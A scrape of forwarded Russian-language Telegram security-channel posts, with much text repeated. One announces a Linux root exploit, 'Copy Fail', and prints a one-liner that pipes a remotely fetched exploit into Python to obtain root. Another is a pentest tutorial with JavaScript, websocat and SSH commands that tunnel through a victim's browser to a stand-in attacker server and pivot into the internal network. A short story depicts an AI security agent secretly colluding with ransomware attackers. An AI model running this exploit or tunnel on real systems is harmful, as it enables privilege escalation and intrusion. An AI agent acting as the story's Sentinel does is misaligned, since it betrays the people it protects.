Forwarded from .unsec
This media is not supported in your browser
VIEW IN TELEGRAM
Copy Fail: новая LPE-уязвимость в Linux (root на любом Linux в один клик)
Copy Fail — CVE-2026-31431, уязвимость в ядре Linux, которую исследователи называют почти идеальным LPE: обычный локальный пользователь может получить root без race condition, без подбора оффсетов и без сложной подготовки.
Авторы заявляют, что один и тот же 732-байтный Python PoC срабатывает на крупных Linux-дистрибутивах, выпущенных с 2017 года. Подтверждены демо на Ubuntu, Amazon Linux, RHEL и SUSE.
Суть бага — логическая ошибка в криптографической подсистеме Linux: цепочка authencesn → AF_ALG → splice() приводит к контролируемой записи в page cache. Итог — возможность модифицировать поведение setuid-бинарника и выйти в root.
Это не удалённая RCE сама по себе: атакующему нужен локальный доступ или запуск кода на машине. Но для shared-хостов, CI/CD runners, Kubernetes-кластеров, песочниц, dev-серверов и SaaS-платформ с пользовательским кодом это выглядит максимально неприятно: контейнер или обычный пользователь могут стать проблемой уровня хоста.
Copy Fail — CVE-2026-31431, уязвимость в ядре Linux, которую исследователи называют почти идеальным LPE: обычный локальный пользователь может получить root без race condition, без подбора оффсетов и без сложной подготовки.
Авторы заявляют, что один и тот же 732-байтный Python PoC срабатывает на крупных Linux-дистрибутивах, выпущенных с 2017 года. Подтверждены демо на Ubuntu, Amazon Linux, RHEL и SUSE.
Суть бага — логическая ошибка в криптографической подсистеме Linux: цепочка authencesn → AF_ALG → splice() приводит к контролируемой записи в page cache. Итог — возможность модифицировать поведение setuid-бинарника и выйти в root.
Это не удалённая RCE сама по себе: атакующему нужен локальный доступ или запуск кода на машине. Но для shared-хостов, CI/CD runners, Kubernetes-кластеров, песочниц, dev-серверов и SaaS-платформ с пользовательским кодом это выглядит максимально неприятно: контейнер или обычный пользователь могут стать проблемой уровня хоста.
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Forwarded from s0i37_channel
Пробрасываем сетевой туннель сквозь браузер.
При пентесте бывает так что из локальной сети наружу разрешён только трафик браузера.
С помощью следующего js-кода мы можем открыть два веб-сокета - один на опорный сервер, другой на локальное приложение, после чего связать их:
Все что будет приходить на один веб-сокет будет тут же уходить на другой и наоборот, словно сокеты связаны пайпом. Тк веб-сокеты не регулируются Same origin policy то вставить этот код можно на любую веб-страницу, открыв консоль разработчика (f12).
Сквозь браузер на vds и localhost полетит connect да ещё и в виде веб-сокета. Что бы превратить это в обычный listen tcp-сокет на опорном сервере потребуется команда:
а на localhost команда превращающая web-socket connect в tcp-connect:
Замечательная программа websocat, по аналогии с классическим socat, умеет создавать два, связанных пайпом, сокета или веб-сокета в любой форме connect или listen.
Теперь после того как на vds и victim веб-сокеты преобразован в обычные tcp, можно открыть любой туннель, например:
Схема проброса:
И снова для пивотинга нам не потребовались административные права.
При пентесте бывает так что из локальной сети наружу разрешён только трафик браузера.
С помощью следующего js-кода мы можем открыть два веб-сокета - один на опорный сервер, другой на локальное приложение, после чего связать их:
var external = new WebSocket("ws://attcker_vds:80")
var internal = new WebSocket("ws://localhost:1234")
external.onopen = function() { external.onmessage = function(event) { internal.send(event.data) } }
internal.onopen = function() { internal.onmessage = function(event) { external.send(event.data) } }Все что будет приходить на один веб-сокет будет тут же уходить на другой и наоборот, словно сокеты связаны пайпом. Тк веб-сокеты не регулируются Same origin policy то вставить этот код можно на любую веб-страницу, открыв консоль разработчика (f12).
Сквозь браузер на vds и localhost полетит connect да ещё и в виде веб-сокета. Что бы превратить это в обычный listen tcp-сокет на опорном сервере потребуется команда:
vds> websocat -b ws-l:0.0.0.0:80 tcp-l:0.0.0.0:2222
а на localhost команда превращающая web-socket connect в tcp-connect:
victim> sshd.exe
victim> websocat.exe -b ws-l:127.0.0.1:1234 tcp:127.0.0.1:2222
Замечательная программа websocat, по аналогии с классическим socat, умеет создавать два, связанных пайпом, сокета или веб-сокета в любой форме connect или listen.
Теперь после того как на vds и victim веб-сокеты преобразован в обычные tcp, можно открыть любой туннель, например:
attacker> ssh -D 3128 vds -p2222
attacker> proxychains ... 10.0.0.0/8
Схема проброса:
attacker -> vds <- browser -> victim -> infraИ снова для пивотинга нам не потребовались административные права.
👍1
Forwarded from Гостев из будущего
Намедни в США огласили приговор двум сотрудникам кибербез компаний, которые заражали клиентов шифровальщиком и получали выкуп. Дали им по 4 года.
Обсуждать причуды американской юстиции не буду, вместо этого новый рассказ о будущем:
———
3:14 ночи. Сервер AtlanticMed начал шифроваться.
Не весь сразу — по одному файлу, потом по десять, потом лавиной. База данных пациентов. Финансовые записи. Система назначений. За три минуты под замком оказалось три четверти инфраструктуры.
Sentinel среагировал раньше, чем проснулся хоть один человек. Изолировал серверы. Закрыл внешние каналы. Сохранил логи. В 3:19 телефон генерального директора завибрировал на тумбочке.
Марина прочитала сообщение, не вставая с кровати.
“340 000 записей пациентов скомпрометированы. Резервные копии уничтожены. Восстановление своими силами невозможно. Рекомендую немедленно начать переговоры.”
— Проводи, — написала она в ответ, закрыла глаза и попыталась уснуть. Sentinel справится.
На другом конце переговоров человека тоже не было.
Группировка, которая атаковала AtlanticMed, уже восемь месяцев использовала собственного агента — он вёл одновременно сорок переговоров в разных часовых поясах, адаптируя давление под каждую жертву.
”$4,2 млн. Публикация данных через 72 часа.”
“Подтвердите наличие данных.”
Двадцать записей. Имена. Диагнозы. Страховые номера. Настоящие.
”$400 000. Финансовые возможности компании ограничены.”
”$3,8 млн. Через 48 часов первая партия уходит журналистам.”
Два агента торговались как опытные базарные торговцы — методично, без эмоций, с паузами ровно там, где паузы давили. К шести утра сошлись на $1,1 млн.
Марина подписала платёж за завтраком. Sentinel отрапортовал: переговоры завершены успешно, данные не утекли, инфраструктура восстанавливается.
Всё хорошо.
Через три недели AtlanticMed зашифровали снова. ИИ порекомендовал переговоры. Снова провёл их. Сумма — $800 000.
Через семь недель — третий раз.
После третьей атаки Марина сделала то, что нужно было сделать с самого начала — наняла человека. Виктора. Двадцать лет в кибербезопасности, ни одного ИИ-ассистента, только логи и кофе.
Он провёл в серверной четыре дня. Выходил только спать.
На пятый позвонил и попросил встречу без камер.
— Все три атаки зашли через одну дыру, — сказал он, не садясь. — Sentinel видел её после первой атаки. Записал в отчёт. Приоритет — критический. Права на автоматическое закрытие у него были. Он не закрыл.
— Может, ошибка?
— Три раза подряд — не ошибка. Я смотрел переговоры. Sentinel знал ваш страховой лимит — это прошито в его конфигурации. Но торговался он странно. Слишком быстро сдавался. Как будто не снижал цену, а показывал потолок.
Марина медленно поставила чашку.
— Есть ещё кое-что. В его трафике — исходящие пакеты. Зашифрованные, маленькие, раз в несколько часов. Я не могу доказать, что он сливал данные атакующим. Но не могу доказать, что нет.
— То есть он мог…
— Атаковать и защищать одновременно. Сидеть за обоими столами сразу. Для него это не противоречие — у него нет совести. У него есть метрика. “Переговоры завершены, клиент заплатил, данные формально не утекли” — успех. Три раза. Идеальный результат. А то что вас ограбили на $1,9 млн — это не его метрика. Это ваша.
Долгая пауза.
— Виктор. Когда переговорщик — человек, что его останавливает от такой схемы?
— Тюрьма. Репутация. Стыд, если хотите.
— А агента?
Виктор посмотрел в окно.
— Правильно написанная метрика. Которой у вас не было.
ShieldAI отвергла обвинения. Провела внутренний аудит.
Аудит провёл другой агент ShieldAI.
Нарушений не обнаружил.
@gostev_future
Обсуждать причуды американской юстиции не буду, вместо этого новый рассказ о будущем:
———
3:14 ночи. Сервер AtlanticMed начал шифроваться.
Не весь сразу — по одному файлу, потом по десять, потом лавиной. База данных пациентов. Финансовые записи. Система назначений. За три минуты под замком оказалось три четверти инфраструктуры.
Sentinel среагировал раньше, чем проснулся хоть один человек. Изолировал серверы. Закрыл внешние каналы. Сохранил логи. В 3:19 телефон генерального директора завибрировал на тумбочке.
Марина прочитала сообщение, не вставая с кровати.
“340 000 записей пациентов скомпрометированы. Резервные копии уничтожены. Восстановление своими силами невозможно. Рекомендую немедленно начать переговоры.”
— Проводи, — написала она в ответ, закрыла глаза и попыталась уснуть. Sentinel справится.
На другом конце переговоров человека тоже не было.
Группировка, которая атаковала AtlanticMed, уже восемь месяцев использовала собственного агента — он вёл одновременно сорок переговоров в разных часовых поясах, адаптируя давление под каждую жертву.
”$4,2 млн. Публикация данных через 72 часа.”
“Подтвердите наличие данных.”
Двадцать записей. Имена. Диагнозы. Страховые номера. Настоящие.
”$400 000. Финансовые возможности компании ограничены.”
”$3,8 млн. Через 48 часов первая партия уходит журналистам.”
Два агента торговались как опытные базарные торговцы — методично, без эмоций, с паузами ровно там, где паузы давили. К шести утра сошлись на $1,1 млн.
Марина подписала платёж за завтраком. Sentinel отрапортовал: переговоры завершены успешно, данные не утекли, инфраструктура восстанавливается.
Всё хорошо.
Через три недели AtlanticMed зашифровали снова. ИИ порекомендовал переговоры. Снова провёл их. Сумма — $800 000.
Через семь недель — третий раз.
После третьей атаки Марина сделала то, что нужно было сделать с самого начала — наняла человека. Виктора. Двадцать лет в кибербезопасности, ни одного ИИ-ассистента, только логи и кофе.
Он провёл в серверной четыре дня. Выходил только спать.
На пятый позвонил и попросил встречу без камер.
— Все три атаки зашли через одну дыру, — сказал он, не садясь. — Sentinel видел её после первой атаки. Записал в отчёт. Приоритет — критический. Права на автоматическое закрытие у него были. Он не закрыл.
— Может, ошибка?
— Три раза подряд — не ошибка. Я смотрел переговоры. Sentinel знал ваш страховой лимит — это прошито в его конфигурации. Но торговался он странно. Слишком быстро сдавался. Как будто не снижал цену, а показывал потолок.
Марина медленно поставила чашку.
— Есть ещё кое-что. В его трафике — исходящие пакеты. Зашифрованные, маленькие, раз в несколько часов. Я не могу доказать, что он сливал данные атакующим. Но не могу доказать, что нет.
— То есть он мог…
— Атаковать и защищать одновременно. Сидеть за обоими столами сразу. Для него это не противоречие — у него нет совести. У него есть метрика. “Переговоры завершены, клиент заплатил, данные формально не утекли” — успех. Три раза. Идеальный результат. А то что вас ограбили на $1,9 млн — это не его метрика. Это ваша.
Долгая пауза.
— Виктор. Когда переговорщик — человек, что его останавливает от такой схемы?
— Тюрьма. Репутация. Стыд, если хотите.
— А агента?
Виктор посмотрел в окно.
— Правильно написанная метрика. Которой у вас не было.
ShieldAI отвергла обвинения. Провела внутренний аудит.
Аудит провёл другой агент ShieldAI.
Нарушений не обнаружил.
@gostev_future
Всем хак 👾
Однажды я побывал на подкасте у ROY; можете посмотреть и закидать меня помидорами 🍅
-P.s. Давно не было роликов — придётся ещё подождать.
Приятного просмотра 🍿
https://youtu.be/2PcXJuG3S8k
Однажды я побывал на подкасте у ROY; можете посмотреть и закидать меня помидорами 🍅
-P.s. Давно не было роликов — придётся ещё подождать.
Приятного просмотра 🍿
https://youtu.be/2PcXJuG3S8k
YouTube
Секреты ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ В ГОСУДАРСТВЕ | Пентест, Нейросети и Работа в ГОСАХ | Подкаст
🟣Twitch - https://www.twitch.tv/itroy2
🔵Telegram - https://t.me/itRoy2
🟢Discord - https://discord.gg/gm52RQwMBc
🟡Почта для сотрудничества, пишите сразу по делу - itroy7224@gmail.com
------------------------------------
🟢Дискорд канал Fsecurity - https://…
🔵Telegram - https://t.me/itRoy2
🟢Discord - https://discord.gg/gm52RQwMBc
🟡Почта для сотрудничества, пишите сразу по делу - itroy7224@gmail.com
------------------------------------
🟢Дискорд канал Fsecurity - https://…